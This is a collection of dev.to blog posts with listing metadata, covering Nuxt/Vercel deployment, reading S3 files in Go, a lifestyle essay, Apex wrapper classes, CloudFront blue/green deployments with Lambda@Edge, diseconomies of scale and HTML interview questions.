  class="crop mx-auto"
  width="380"
  height="380"
  :imgixParams="{fit:'fill', fill:'solid', fillcolor:'f7fafc', trim:'auto'}"
  loading="lazy"
  fixed
/>
```
Now the images will work: they look consistent, are all automatically trimmed, good quality, and performant!
## Let's Deploy
We are on the home stretch. So I am going to choose to deploy on Vercel. I like how easy it is to deploy SSR with Vercel. In order to do that, I created a vercel.json file and added this:
```json
{
  "builds": [
    {
      "src": "nuxt.config.js",
      "use": "@nuxtjs/vercel-builder",
      "config": {}
    }
  ]
}
```
Now, you can just commit this all to your Github account. Then log in to Vercel, import a new project from that Github account. While you are in the process of deploying the site on Vercel, the last item you need to do is to add the items you put in your .env file into the variables section.

These would be the Storefront API token and Shopify domain. You can just copy the values from there and enter them in Vercel. Just don't enter the values with "" around them; that is not needed in Vercel. Press deploy and soon you should be seeing Vercel's fireworks: your site is up and running using headless Shopify!
Don't hesitate to comment or reach out if you have questions. I think the video recording can be very helpful to go along with this explanation. Would love to see anything you are all working on as well.
| daletom |
708,504 | Fetching and reading files from S3 using Go 🔥👀 | Trying to figure out how to do simple tasks using the AWS SDK for particular services can be difficul... | 0 | 2021-05-26T15:26:11 | https://dev.to/seanyboi/fetching-and-reading-files-from-s3-using-go-4180 | aws, go, s3, machinelearning | Trying to figure out how to do simple tasks using the AWS SDK for particular services can be difficult given that sometimes the AWS documentation is limited and gives you the bare minimum. Today I'll show you how to fetch and read particular files from S3 using Go. This tutorial collates many hours of research into what should be a simple problem.
Prerequisites include:
* Go installed / previous experience with Go.
* AWS-SDK set up / previous development with AWS-SDK.
### Basic imports
```go
import (
    "encoding/json"
    "fmt"
    "io/ioutil"
    "log"
    "strings" // needed for strings.Contains when filtering keys below

    "github.com/aws/aws-lambda-go/lambda"
    "github.com/aws/aws-sdk-go/aws"
    "github.com/aws/aws-sdk-go/aws/session"
    "github.com/aws/aws-sdk-go/service/s3"
)
```
### Defining global variables and structs.
Start off by defining some basic structs and global variables.
```go
type S3Bucket struct {
    Bucket string `json:"bucket"`
    Key    string `json:"key"`
}

type Metrics struct {
    RMSE string `json:"rmse"`
    MAE  string `json:"mae"`
    MAPE string `json:"mape"`
}

var pageNum int = 0
var s3Buckets []S3Bucket
var finalMetrics []Metrics
var sess *session.Session
```
### Initiating a session.
Firstly we initialise a session that the SDK uses to load credentials from the shared credentials file ~/.aws/credentials, and create a new Amazon S3 service client.
```go
sess, err := session.NewSession(&aws.Config{
    Region: aws.String(conf.AWS_REGION),
})
if err != nil {
    exitErrorf("Unable to create a new session %v", err)
}
```
### Listing items in a bucket with pagination.
The AWS docs only give an example of accessing a bucket's files using the [`ListObjectsV2`](https://docs.aws.amazon.com/sdk-for-go/api/service/s3/#S3.ListObjectsV2) function. The problem I encountered with this function is that it does not allow us to apply our own custom function to the results in order to filter them further. Another problem is that it returns up to 1,000 of the objects in a bucket with each request. This includes sub-paths to the files you wish to read.
`ListObjectsV2` lists all objects in our S3 bucket tree, even objects that do not contain files. If we want to target certain objects, we have to apply a function. So instead, we'll use [`ListObjectsV2Pages`](https://docs.aws.amazon.com/sdk-for-go/api/service/s3/#S3.ListObjectsV2Pages). `ListObjectsV2Pages` iterates over the pages of a `ListObjectsV2` operation, calling the function with the response data for each page. To stop iterating, we return `false`.
As shown below, I wish to target only the `.json` files in the page and append them to the `s3Buckets` slice. This part is important as it will allow us to know the location of each file so we can then access the contents!
We pass our main bucket name as S3_BUCKET and our object path if there is one into S3_PREFIX.
```go
svc := s3.New(sess)
err = svc.ListObjectsV2Pages(&s3.ListObjectsV2Input{Bucket: aws.String(S3_BUCKET), Prefix: aws.String(S3_PREFIX)},
    func(page *s3.ListObjectsV2Output, lastPage bool) bool {
        pageNum++
        for _, item := range page.Contents {
            if strings.Contains(*item.Key, "json") {
                s3Buckets = append(s3Buckets, S3Bucket{Bucket: conf.S3_BUCKET, Key: *item.Key})
            }
        }
        // keep paging (up to 100 pages); returning false stops the iteration
        return pageNum < 100
    })
if err != nil {
    exitErrorf("Unable to list items in bucket %q, %v", conf.S3_BUCKET, err)
}
```
### Accessing the object contents.
Using the `s3Buckets` slice, we will access the `Bucket` and `Key` from each `struct`, build the object request (in other words, a request for the file), and then fetch the object based on that information.
```go
for _, item := range s3Buckets {
    requestInput := &s3.GetObjectInput{
        Bucket: aws.String(item.Bucket),
        Key:    aws.String(item.Key),
    }

    result, err := svc.GetObject(requestInput)
    if err != nil {
        log.Print(err)
    }
```
### Reading the contents into slice
The JSON object `result` is read with the `ioutil.ReadAll()` function, which returns a byte slice that is decoded into a `Metrics` struct instance using the `json.Unmarshal()` function.
The best tutorial I have found regarding reading JSON into a `struct` is this one: [Parsing JSON](https://www.sohamkamani.com/golang/parsing-json/)
```go
    defer result.Body.Close() // note: defers inside a loop only run when the surrounding function returns
    body, err := ioutil.ReadAll(result.Body)
    if err != nil {
        log.Print(err)
    }

    var metrics Metrics
    err = json.Unmarshal(body, &metrics)
    if err != nil {
        fmt.Println("unmarshal error:", err)
    }

    finalMetrics = append(finalMetrics, metrics)
}
```
And that's it! You have now fetched JSON files from a certain bucket and parsed the results into a `struct`. In my opinion, especially in machine learning, fetching the contents of an S3 file is hugely important as engineers we are constantly wanting to see and compare for example past models' performance or fetching additional data features to append to our models. | seanyboi |
708,574 | Live like a monk - the key to success | Don't get me wrong, I'm not particularly successful. If I look around I see prettier, richer, more po... | 0 | 2021-05-26T05:28:12 | https://www.sandordargo.com/blog/2021/05/26/living-like-a-monk | watercooler, productivity, lifestyle | Don't get me wrong, I'm not particularly successful. If I look around I see prettier, richer, more popular people. People who rose more in the company ranks, people who write better code, who can contribute more, who make more money either from their main job or on the side, people who write better posts and who simply know much more than me.
And you know what? I'm fine with that.
It doesn't matter.
What matters to me is that I'm growing and that I'm happy with the progress I made during the last years. Each day if I look back to where I was 6 months ago, I see some gain. I could also see gaps, I could think about how many things I messed up, how many things I could have done better, but that would lock me up in negativity. Instead, I'm happy for my growth.
The key element for this growth, at least as I see it, is not learning about my craft every day - though that's definitely important - and it's not writing and working on my posts and books each day. What helps most is that I read some uplifting, inspirational, motivational content on a daily basis. (Which pushes me towards the former activities.)
A few years ago I started to seriously limit and filter my content consumption. I read to help me reach better mental states. Instead of reading about people killing others or making their and others' lives more miserable, I read about how to grow. I read about how to help others.
One of my key sources is [Benjamin Hardy](https://benjaminhardy.com/articles/)'s articles and books. I've been watching [one of his videos](https://www.youtube.com/channel/UC07WXGmXVbNrv3VMOp5DvDw) recently where he shared a quote from [Marshall Goldsmith](https://twitter.com/coachgoldsmith):
> *"If you do not create and control your environment, your environment creates and controls you."*
It really clicked with me. This is something I've been pondering about for a while. In fact, since I went back to my hometown for three weeks.

I love my hometown, Budapest, and I love my friends there, I love my family. But I also noticed a couple of things:
- Even though I managed to carve out some time for myself, it felt unproductive
- I saw how people limit themselves through unsolicited conflicts
- I saw how people are controlled by their environments. Including me.
## TV kills both family time and productivity
According to different studies, an average US adult spends more than 4 hours a day in front of the TV. I have no data on European countries - I didn't really check - but I have no strong reason to believe that it's drastically different.
Though it seems that the younger you are, the less time you spend watching the telly, it's not for a good reason. Scrolling social media or watching Netflix on your mobile is not better than watching the TV.
We have one in our living room, but we barely use it. We turn it on on New Year's Eve a bit before midnight (since our kids were born and they are still small we spend the night at home), during some weekends to make a movie afternoon for the kids and each time our president declares war on COVID and asks for the support of his "compatriots". But even that has become boring. Sorry, Monsieur Macron, this is not your fault. It's just boring.
At my father's place, it's different. The TV is on in the morning, in the afternoon and in the evening as well. He often falls asleep while the TV is still turned on.
In the mornings, it didn't bother me. As most people in the house were sleeping anyways, I hid in a small room and kept working on my articles and presentations.
In the evening it was different. I joined my father and brother in the living room where they were either watching some football or the nth replay of some stand-up comedy.
I don't like to talk for the sake of talking. You should ask my wife about that... But I like to be close to my loved ones. Even if it means just being in the same room and reading, working on stuff.
I realized that having the TV on, even if I didn't pay attention, was very distracting.
I was the guest, and obviously I wouldn't ask them to turn it off when they were actually watching it so that I could read or work, but I was wondering how much useful time is flushed down the toilet like that. Just by watching something not even interesting [while others are working towards their dreams](https://www.youtube.com/watch?v=1g2ntIN7JuY).
When I was left alone with my brother, we often turned it off to talk. But when we were talking with the TV on in the background, I saw that it was difficult to pay full attention. That freaking box is killing both dreams and social times. We should throw our TVs out... Or at least it should not be the center of our living rooms and our lives...
But there is something worse than that.
When you have a TV in the kitchen or in the dining room, or when they share one space with the living room, and you turn on the news while eating - it's the worst. I lived like that from when I was 14 until I left home.
I tell you what it does. Instead of discussing what matters in the life of a family, such as what happened during the day, what do you plan for next day, what you learnt, what you experienced, what was going on at school, at work, you watch the news.
The news is depressing. There are natural disasters. Accidents. People die. Sometimes you don't even understand how anyone is still alive. But that's not the worst. There are terrorist attacks that obviously create even more hate. It's still not the worst. There are rich people enjoying their money. And boy, people are envious. There are politicians who get richer in mysterious ways. These are the worst because you can complain about "those thieves". You can blame them for your lack of success. You can blame the rich, the politicians, for your miserable life.
Believe me, those who watch the news during their meals will blame, will complain, will make their lives a bit sadder. They will smuggle a bit of extra frustration, a bit of extra misery and a big bunch of victim mindset into their everyday lives.
That's the biggest problem with television.
So if you want a better life, get rid of the TV, or at least don't watch the news, and please, please, at least not during meals.
## Active social life collects taxes, even the next day
Apart from the TV, an extended social life also made it more difficult to stay productive. I have way more friends in Hungary than in France. It makes sense. I spent 28 years in Hungary, 8 in France. And those years in Hungary were my youth, they were the actively socializing years, plus I was fully involved in a few organizations where I made many friends. I already came to France married and soon we had children.
My social groups are very different in the two countries.
I barely go out in the evenings in France (regardless of the current curfew), but in Hungary there are calls almost every day, I have to turn down so many.
I know it would be different if I were constantly at home. But I see the lives of my friends, I see how they live, how frequently they go out, etc. I'd probably step out at least twice a week and the weekends would also be different than they are here.
It means that I'd be doing something very different during those evenings, and it'd probably be very difficult to wake up so early the next morning.
When I was thinking about all this, I realized that I almost live like a monk.
I live far away from most of my friends, I seriously limit my media intakes, I spend most morning and evenings in silence, reading or working on my articles, books, etc.
It happened a few times lately that my wife asked if everything was fine because I looked strange. I said, oh yes, I was just writing in my head.
Do I enjoy it? Yes.
Living an active social life is fun, but it requires some sacrifices. You sacrifice a lot of time. Sure, you'll have fun, that's good, but you'll have less time to achieve your goals - unless it's having fun. Often, you don't only sacrifice the time you spend with your friends and acquaintances. And I don't mean the traveling, but you might be more exhausted the next day. Oh, maybe I'm just not 21 anymore when I could directly go to university after partying all night and get some sleep between two classes. Sure, life changed, I changed.
I realized the importance of what successful people write about friendships. You need to pay attention to who you spend your time with. You need to say no sometimes and you need to spend less time with people if you feel that your roads have parted in different ways. You don't stay there out of comfort and (self-)pity. You don't stay there when your only common topic is reheating memories from 15 years ago.
Your personality is not permanent. It's perfectly fine that you want different things than before. But most people around you, including your family, friends, will not want you to change. It's easier to spend time with someone they already know. They also don't want to be jealous, they don't want to be reminded that they can also change themselves. That there are different ways of living your life. Beware, I don't say better, but different. After all, different is not always better...
I needed lots of time and great distance to start to understand this and I'm still far from a complete understanding.
## A conclusion?
Is there any? Anyone should draw his or her own, but...
The TV is bad if you turn it on (too much) and especially if you mix it with family time! Don't do that if you want a happy and/or successful life!
The question of an extended social life is more difficult. Having friends is great, but it's better to have a few great ones than several shallow ones. As you grow up, you have a family, you have new goals, you need time and you start valuing the real relationships.
You have to control your environment, you have to actively shape it so that it helps you to achieve your goals. This means both your physical environment - hopefully one not centered around a TV - and your social one.
It can sound harsh, but you also have to actively manage your circles, who you spend time with. It cannot happen by rote; it must be the result of conscious decisions.
If you do this, if you limit and filter your media and social intakes, you might feel like you live like a monk. At the same time, you'll also feel your soul cleaner and calmer. You'll have the necessary time and peace to work towards your goals.
What's your take on this?
## Connect deeper
If you liked this article, please
- hit on the like button,
- [subscribe to my newsletter](http://eepurl.com/gvcv1j)
- and let's connect on [Twitter](https://twitter.com/SandorDargo)!
| sandordargo |
708,785 | Wrapper Class vs Helper Class vs Controller Class | Wrapper Class: To wrap the Data types to make a single object which can be assessable easily in other... | 0 | 2021-05-26T03:37:43 | https://dev.to/bhanukarkra/wrapper-class-vs-helper-class-vs-controller-class-abm | programming | **Wrapper Class**: To wrap the Data types to make a single object which can be assessable easily in other classes.
**Controller Class**: A controller class contains public methods called action methods. Each method has a one-to-one link with a possible user action, ranging from the click of a button to another trigger. The controller class methods process input data, execute application logic and determine the view.
```
public class WrapNitesh {
    // CONTROLLER CLASS
    public list<wrapaccount> wrapaccountList { get; set; }
    public list<account> selectedAccounts { get; set; }

    public WrapNitesh() {
        // if (wrapaccountList == null) {
        wrapaccountList = new list<wrapaccount>();
        for (account a : [select id, name, billingcity, phone from account limit 10]) {
            wrapaccountlist.add(new wrapaccount(a));
        }
        // }
    }

    // The selected accounts are collected by this method
    public void ProcessSelected() {
        selectedAccounts = new list<account>();
        for (wrapaccount wrapobj : wrapaccountlist) {
            if (wrapobj.isSelected == true) {
                selectedAccounts.add(wrapobj.accn);
            }
        }
    }

    // WRAPPER CLASS: an account and a checkbox wrapped together
    public class wrapaccount {
        public account accn { get; set; }
        public boolean isSelected { get; set; }

        public wrapaccount(account a) {
            accn = a;
            isSelected = false;
        }
    }
}
```
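The wrapper idea isn't Apex-specific. Here is a minimal Python sketch of the same pattern; the `Account` class and field names are stand-ins for the real sObject, not part of the original example:

```python
class Account:
    """Stand-in for the Apex Account sObject."""
    def __init__(self, name):
        self.name = name

class WrapAccount:
    """Wrapper: pairs a record with UI state (the checkbox)."""
    def __init__(self, account):
        self.account = account
        self.is_selected = False

def process_selected(wrapped):
    """Return the records whose checkbox was ticked."""
    return [w.account for w in wrapped if w.is_selected]

wrapped = [WrapAccount(Account(n)) for n in ("Acme", "Globex", "Initech")]
wrapped[1].is_selected = True
print([a.name for a in process_selected(wrapped)])  # ['Globex']
```

The point in both languages is the same: the wrapper bundles a record together with extra per-row state that doesn't belong on the record itself.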
**Helper Class**: A helper class provides supporting functionality that isn't the main goal of the application or of the class in which it is used. For example, this PHP helper splits a multi-line string into trimmed lines:
```
// Split a multi-line string into an array of trimmed lines
function linesOf($mls) {
    return preg_split('/\s*\n\s*/', trim($mls));
}
```
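For comparison, a rough Python equivalent of that PHP helper (assuming the same "split a multi-line string into trimmed lines" behaviour):

```python
import re

def lines_of(mls):
    # Trim the whole string, then split on newlines plus surrounding whitespace
    return re.split(r'\s*\n\s*', mls.strip())

print(lines_of("  a \n  b\nc  "))  # ['a', 'b', 'c']
```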
| bhanukarkra |
708,851 | Make A Payment From Apple Pay To Cash App Which Is A Non-Verified Account | Do you want to make a payment from Apple Pay To Cash App account even if you are not using a verified... | 0 | 2021-05-26T06:26:16 | https://dev.to/nancybr65040277/make-a-payment-from-apple-pay-to-cash-app-which-is-a-non-verified-account-b05 | applepaytocashapp | Do you want to make a payment from Apple Pay to a Cash App account even if you are not using a verified account? Keep in mind that you first have to verify your account, and then you should make sure you have a common bank account associated with your Cash App account.
https://www.experts-support.com/blog/transfer-money-from-apple-pay-to-cash-app
| nancybr65040277 |
708,859 | "CloudFront deployments with Lambda@Edge" | A/B Testing, Blue/Green deployments, Canary releases. Different, but still so much in common. They... | 0 | 2021-05-26T06:45:16 | https://dev.to/aws-builders/cloudfront-deployments-with-lambda-edge-gh5 | aws, devops, lambda | ---
title: "CloudFront deployments with Lambda@Edge"
published: true
tags: aws, devops, lambda
cover_image: https://dev-to-uploads.s3.amazonaws.com/uploads/articles/9uco0ab7c0l3atowphxu.png
---
A/B Testing, Blue/Green deployments, Canary releases. Different, but still so much in common. They all have different purposes but basically use the same technical solution under the hood. We run these kinds of tests for several reasons. One is to do an A/B test and determine which version our users like best. Sure, it is possible to do A/B testing on the client side, but personally I find it easier to do on the server side.
Blue/Green and Canary deployments are done to make sure a new version of the application works as we expect and to give us an easy way to roll back to the previous version in case of a problem. All of these are important practices in the DevOps culture.
Many AWS services offer this solution out of the box; one service that doesn't is CloudFront. Luckily, CloudFront can run Lambda@Edge, which we can use to solve this.
All source code for this setup is found on [GitHub][github-link]
## Introducing Lambda@Edge
Lambda can run in four different locations in the request flow.

**Viewer request** - Is run when CloudFront receives a request from a viewer.
**Origin request** - Is run before CloudFront forwards a request to the origin.
**Origin response** - Is run when CloudFront receives a response from the origin.
**Viewer response** - Is run before CloudFront returns the response to the viewer.
There are several limitations when it comes to Lambda@Edge: it is only possible to create functions in Python and Node.js. Viewer request and response functions can only allocate 128 MB of memory and only run for 3 seconds. You can't use environment variables, and you can't use the _latest_ version alias; only fixed versions are supported. Logs are published to the edge region that you access and not to the _us-east-1_ region, even though the functions must be deployed to that region. Be sure to read the **[documentation][lambda-at-edge-doc-restrictions-link]** before you start working with Lambda@Edge.
## Solution Overview
In this solution we are going to use two different Lambda functions for the _viewer request_ and _viewer response_ hooks; we will store configuration in Parameter Store, and S3 is our origin.

In the _viewer request_ hook we check for a special cookie; if the cookie is not set, we pick a random version. In the _viewer response_ hook we set the _set-cookie_ header to store the version we are using.
By setting different values in Parameter Store we can control the weight of each version and we can also reset and have clients receive new random version.
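The decision logic can be sketched outside Lambda. This toy version uses plain arguments instead of Parameter Store lookups and the real cookie format (`pick_version` and its parameter names are illustrative, not from the original code), but the weight and reset behaviour are the same idea:

```python
import random

def pick_version(cookie_version, weight, reset_cookie, reset_value):
    """Return the version to serve.

    cookie_version: version from X-Version-Name, or None
    weight: percentage of traffic that should get 'Blue' (0-100)
    reset_cookie / reset_value: if they differ, ignore the sticky cookie
    """
    if cookie_version and reset_cookie == reset_value:
        return cookie_version  # sticky: keep the version the client already has
    # No (valid) cookie: roll the dice using the configured weight
    return 'Blue' if random.random() < weight / 100.0 else 'Green'

print(pick_version('Green', weight=50, reset_cookie='1', reset_value='1'))   # Green
print(pick_version('Green', weight=100, reset_cookie='1', reset_value='2'))  # Blue (reset forces a re-roll)
```

Raising the weight shifts new clients toward Blue, while bumping the reset value forces every client, sticky cookie or not, to re-roll.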
## Viewer Request
Let's start with the Lambda function that reacts to the viewer request event. This function is responsible for checking our cookie _X-Version-Name_: if a value is set, the function updates the request path based on the cookie value. The function also matches the value of the cookie _X-Version-Reset_ against a value in Parameter Store; if the values differ, any value set in _X-Version-Name_ is ignored. If there is no value in _X-Version-Name_, or if the value is ignored, the function rolls the dice and picks a version at random. The weights for the different versions are controlled by a value in Parameter Store. Finally, the function passes the cookie on to the next step in the call chain.
### The Viewer Request code
Full version is available in [GitHub][github-link].
```python
import random

# load_parameter (reads from Parameter Store) and do_weight_reset (compares the
# X-Version-Reset cookie with Parameter Store) are defined in the full version on GitHub.

def lambda_handler(event, context):
    request = event['Records'][0]['cf']['request']
    headers = request['headers']
    cookie_version_blue = 'X-Version-Name=Blue'
    cookie_version_green = 'X-Version-Name=Green'
    path_blue = '/Blue'
    path_green = '/Green'
    uri = ''

    if request['uri'].endswith('/'):
        request['uri'] = request['uri'] + 'index.html'

    if 'cookie' not in request['headers']:
        request['headers']['cookie'] = []

    # Reset weights, ignore already set cookie
    reset_weight, reset_cookie = do_weight_reset(headers)
    if not reset_weight:
        for cookie in headers.get('cookie', []):
            if cookie_version_blue in cookie['value']:
                uri = path_blue + request['uri']
                break
            elif cookie_version_green in cookie['value']:
                uri = path_green + request['uri']
                break

    request['headers']['cookie'].append(
        {'key': 'Cookie', 'value': reset_cookie})

    # No sticky version found: pick one at random, weighted by Parameter Store
    if not uri:
        weight = int(load_parameter('Weight'))
        cookie_value = ''
        if random.random() < float(weight / 100.0):
            uri = path_blue + request['uri']
            cookie_value = cookie_version_blue
        else:
            uri = path_green + request['uri']
            cookie_value = cookie_version_green
        request['headers']['cookie'].append(
            {'key': 'Cookie', 'value': cookie_value})

    request['uri'] = uri
    return request
```
## Viewer Response
The _viewer response_ function basically has one task: to pass the _set-cookie_ header back to the client. This is needed so the client stores the cookies _X-Version-Name_ and _X-Version-Reset_ and sends them in the next request, which keeps the client from jumping between versions. A small but very important job.
### The Viewer Response code
Full version is available in [GitHub][github-link].
```python
def lambda_handler(event, context):
    response = event['Records'][0]['cf']['response']
    request = event['Records'][0]['cf']['request']

    # Persist cookie, set the set-cookie header
    if 'set-cookie' not in response['headers']:
        response['headers']['set-cookie'] = []

    request_headers = request['headers']
    cookie_version_blue = 'X-Version-Name=Blue'
    cookie_version_green = 'X-Version-Name=Green'
    cookie_reset = 'X-Version-Reset'

    for cookie in request_headers.get('cookie', []):
        if cookie_version_blue in cookie['value']:
            response['headers']['set-cookie'].append(
                {'key': 'set-cookie', 'value': cookie_version_blue})
        elif cookie_version_green in cookie['value']:
            response['headers']['set-cookie'].append(
                {'key': 'set-cookie', 'value': cookie_version_green})
        elif cookie_reset in cookie['value']:
            response['headers']['set-cookie'].append(
                {'key': 'set-cookie', 'value': cookie['value']})
    return response
```
## Deploying the functions
The Lambda functions need to be deployed in the us-east-1 region, since that is the region Lambda@Edge originates from. We must also use a fixed version and can't use the _latest_ alias. As usual, AWS SAM is used to define and deploy the Lambda functions.
### The SAM Template
Full version is available in [GitHub][github-link].
```yaml
  ViewerRequestFunction:
    Type: AWS::Serverless::Function
    Properties:
      AutoPublishAlias: "true"
      Runtime: python3.7
      MemorySize: 128
      Timeout: 3
      CodeUri: ./viewer-request
      Handler: handler.lambda_handler
      AssumeRolePolicyDocument:
        Version: 2012-10-17
        Statement:
          - Effect: Allow
            Principal:
              Service:
                - lambda.amazonaws.com
                - edgelambda.amazonaws.com
            Action:
              - sts:AssumeRole
      Policies:
        - SSMParameterReadPolicy:
            ParameterName: !Sub ${SsmConfigPath}/*
        - Version: "2012-10-17"
          Statement:
            Action:
              - lambda:GetFunction
            Effect: Allow
            Resource: "*"

  ViewerResponseFunction:
    Type: AWS::Serverless::Function
    Properties:
      AutoPublishAlias: "true"
      Runtime: python3.7
      MemorySize: 128
      Timeout: 3
      CodeUri: ./viewer-response
      Handler: handler.lambda_handler
      AssumeRolePolicyDocument:
        Version: 2012-10-17
        Statement:
          - Effect: Allow
            Principal:
              Service:
                - lambda.amazonaws.com
                - edgelambda.amazonaws.com
            Action:
              - sts:AssumeRole
      Policies:
        - Version: "2012-10-17"
          Statement:
            Action:
              - lambda:GetFunction
            Effect: Allow
            Resource: "*"
```
## CloudFront setup
Finally we need to create the CloudFront distribution and attach the Lambda functions to the viewer request and viewer response triggers. Normally CloudFront will not forward cookies or include them in the cache key. Since our setup depends on two cookies, we must make sure CloudFront passes them along. That is done by adding them to the _WhitelistedNames_ section. Wildcards are supported, so we just add _X-Version-*_ to that section.
### The CloudFormation Template
Full version is available in [GitHub][github-link].
```yaml
  CloudFrontDistribution:
    Type: AWS::CloudFront::Distribution
    Properties:
      DistributionConfig:
        Comment: !Sub "Distribution for ${ProjectName}"
        DefaultCacheBehavior:
          AllowedMethods:
            - "GET"
            - "HEAD"
            - "OPTIONS"
          Compress: False
          DefaultTTL: 0
          MaxTTL: 0
          MinTTL: 0
          ForwardedValues:
            QueryString: False
            Cookies:
              Forward: whitelist
              WhitelistedNames:
                - "X-Version-*"
          LambdaFunctionAssociations:
            - !If
              - ViewerRequestLambdaArnSet
              - EventType: viewer-request
                LambdaFunctionARN: !Ref ViewerRequestLambdaArn
              - !Ref AWS::NoValue
            - !If
              - ViewerResponseLambdaArnSet
              - EventType: viewer-response
                LambdaFunctionARN: !Ref ViewerResponseLambdaArn
              - !Ref AWS::NoValue
          TargetOriginId: !Sub ${ProjectName}-origin
          ViewerProtocolPolicy: redirect-to-https
        DefaultRootObject: !Ref DefaultRootObject
        Enabled: True
        Origins:
          - DomainName: !Sub ${StorageBucket}.s3.amazonaws.com
            Id: !Sub ${ProjectName}-origin
            S3OriginConfig:
              OriginAccessIdentity: !Sub origin-access-identity/cloudfront/${OriginAccessIdentity}
        PriceClass: PriceClass_100
      Tags:
        - Key: Name
          Value: !Sub ${ProjectName}
```
## Conclusion
Even though CloudFront doesn't support these deployment techniques out of the box, Lambda, as so many times before, comes to the rescue. The versatility of AWS Lambda is truly a miracle! Download the code and take it for a spin!
Happy hacking!
[lambda-at-edge-doc-restrictions-link]: https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide | jimmydqv |
708,930 | Diseconomies of Scale | We’ve all heard of economies of scale: the increase in per-unit efficiency by producing or doing a... | 0 | 2021-05-30T21:23:29 | https://jhall.io/archive/2021/05/26/diseconomies-of-scale/ | scaling, efficiency, practices, team | ---
title: Diseconomies of Scale
published: true
date: 2021-05-26 00:00:00 UTC
tags: scaling,efficiency,practices,team
canonical_url: https://jhall.io/archive/2021/05/26/diseconomies-of-scale/
---
We’ve all heard of economies of scale: the increase in per-unit efficiency by producing or doing a large number of like things. This simple concept is probably the single biggest idea responsible for the industrial revolution.
And it’s become such an implicit part of our thinking that we often forget that not everything benefits from economies of scale. Some things have _diseconomies of scale_. Some things have both, with an inflection point of maximal efficiency:

_[Image source](https://boycewire.com/types-of-diseconomies-of-scale/)_
Finding this point is rarely easy in a practice as complex as software development, but it’s worth making an effort to at least get closer to it!
* * *
_If you enjoyed this message, [subscribe](https://jhall.io/daily) to <u>The Daily Commit</u> to get future messages to your inbox._ | jhall |
708,967 | Most Asked Html Questions | 1.Why are you interested in using HTML to build websites? Ans:“Web-building tools are great for profe... | 0 | 2021-05-26T08:37:05 | https://dev.to/iftakher99/most-asked-html-questions-1ae2 | html | **1.Why are you interested in using HTML to build websites?**
Ans: "Web-building tools are great for professional developers, but I think it's important to understand the underlying technology so I have more control over how sites look and behave. For instance, when I use WordPress to build a site, I often find that I can get better results by inserting my own HTML instead of relying on the provided tools."
**2.Do you know any other languages that make you a better website developer?**
Ans: Once I started developing larger websites, I learned CSS so I wouldn't have to update each page's appearance by hand. I also have some experience with JavaScript. I only know the basic functions, but I can use them to make websites more useful and interactive. I've been watching tutorials to make my JavaScript capabilities more robust. Besides that, I know Bootstrap, React.js, Material UI, Node.js, Express.js, MongoDB, Firebase, Redux, and more.
**3.What’s the difference between a block-level element and an inline element?**
Ans: Each element in HTML is displayed in one of a few ways. By default, most tags are displayed as either block-level or inline. This value can be overridden using CSS.
**Block**
As the name suggests, a block-level element is drawn as a block that stretches to fill the full width available to it (the width of its container) and will always start on a new line.
Examples of elements that are block-level by default: `<div>`, `<p>`, `<section>`, `<form>`, `<nav>`.
**Inline**
Unlike block-level elements, inline elements are drawn where they are defined and only take up the space that is absolutely needed. The easiest way to understand how they work is to look at how text flows on a page. When a line of text gets to the end of the available space, it wraps onto the next line and happily keeps going. If you were to tack more text onto an existing line, it would stay on the same line, as if it were all part of the same text to begin with.
Examples of elements that are inline by default: `<span>`, `<b>`, `<strong>`, `<a>`, `<input>`.
**4. What can you say about the new semantic features added in HTML5?**
Ans: It introduced a number of semantic elements, which is to say elements that convey meaning. Some of the new semantic elements are `<header>`, `<footer>`, `<section>`, and `<article>`. They are semantic in that they are not just simple containers; they tell the browser more about their contents.
There are also additional form input types, like `number`, `date`, and `range`. Video and audio elements have been added as well, along with new graphic elements such as `<svg>` and `<canvas>`.
**5. What are some of the key new features in HTML5?**
Some features you could mention include:

- Improved support for embedding rich content like graphics, audio, and video
- The introduction of web workers
- New semantic tags including `<main>`, `<nav>`, `<article>`, `<section>`, `<header>`, `<footer>`, and `<aside>`
- Extensions to the JavaScript API
- Additional form input types like `date`, `time`, `email`, `url`, and `search`

Some advantages of HTML5 are:

- It has multimedia support.
- It can store offline data using SQL databases and the application cache.
- JavaScript can be run in the background.
- HTML5 also allows users to draw various shapes like rectangles, circles, triangles, etc.
- It includes new semantic tags and form control types.
**6.What are tags and attributes in HTML?**
Ans: Tags are the primary components of HTML and define how the content will be structured and formatted, whereas attributes are used along with HTML tags to define the characteristics of an element. For example, in `<p align="center">Interview questions</p>`, `align` is the attribute used to align the paragraph in the center of the view.
**7. What is the significance of the `<head>` and `<body>` tags in HTML?**
Ans: The `<head>` tag provides information about the document. It should always be enclosed in the `<html>` tag. It contains metadata about the web page, and the tags it encloses, like `<link>`, `<meta>`, `<style>`, `<script>`, etc., are not displayed on the web page. Also, there can be only one `<head>` tag in the entire HTML document, and it always comes before the `<body>` tag.
The `<body>` tag defines the body of the HTML document. It should always be enclosed in the `<html>` tag. All the content that needs to be displayed on the web page, like images, text, audio, and video, using elements like `<p>`, `<img>`, `<audio>`, `<heading>`, `<video>`, `<div>`, etc., is always enclosed by the `<body>` tag. Also, there can be only one body element in an HTML document, and it always comes after the `<head>` tag.
**8. Can we display a web page inside another web page? Is nesting of web pages possible?**
Ans: Yes, we can display a web page inside another HTML web page. HTML provides the `<iframe>` tag, with which we can achieve this functionality:
`<iframe src="url of the web page to embed"></iframe>`
| iftakher99 |
